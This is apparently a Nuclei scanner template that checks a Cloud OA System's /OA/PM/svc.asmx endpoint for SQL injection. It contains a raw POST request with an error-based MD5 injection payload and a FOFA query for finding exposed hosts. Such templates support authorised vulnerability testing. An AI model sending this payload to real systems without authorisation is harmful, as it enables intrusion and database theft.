id: cloud-oa-system-sqli info: name: Cloud OA System - SQL Injection author: SleepingBag945 severity: high description: | cloud OA system /OA/PM/svc.asmx page parameters are not properly filtered, resulting in a SQL injection vulnerability, which can be used to obtain sensitive information in the database. reference: - https://github.com/GREENHAT7/pxplan/blob/e2fc04893ca95e177021ddf61cc2134ecc120a8e/xray_pocs/yaml-poc-eqccd-eqccd_oa-sql_injection-CT-456760.yml#L8 metadata: verified: true max-request: 1 fofa-query: body="全程云办公" && body="/OA/WebResource.axd" tags: cloud,cloudoa,sqli variables: num: "999999999" http: - raw: - | POST /OA/PM/svc.asmx HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml LOWER(CONVERT(VARCHAR(32),HashBytes('MD5','{{num}}'),2)) matchers-condition: and matchers: - type: word part: body words: - "System.Data.SqlClient.SqlException" - "{{md5(num)}}" condition: and - type: word part: header words: - text/xml - type: status status: - 500 # digest: 490a0046304402201ef7eee5943cd3f135682a31365b7e6e55689cfc32f27191495dd04665d674c402206add4553dd66405401f96e1d14db0797a45c9bfc1beb88c8fd8674137a9d81d7:922c64590222798bb761d5b6d8e72950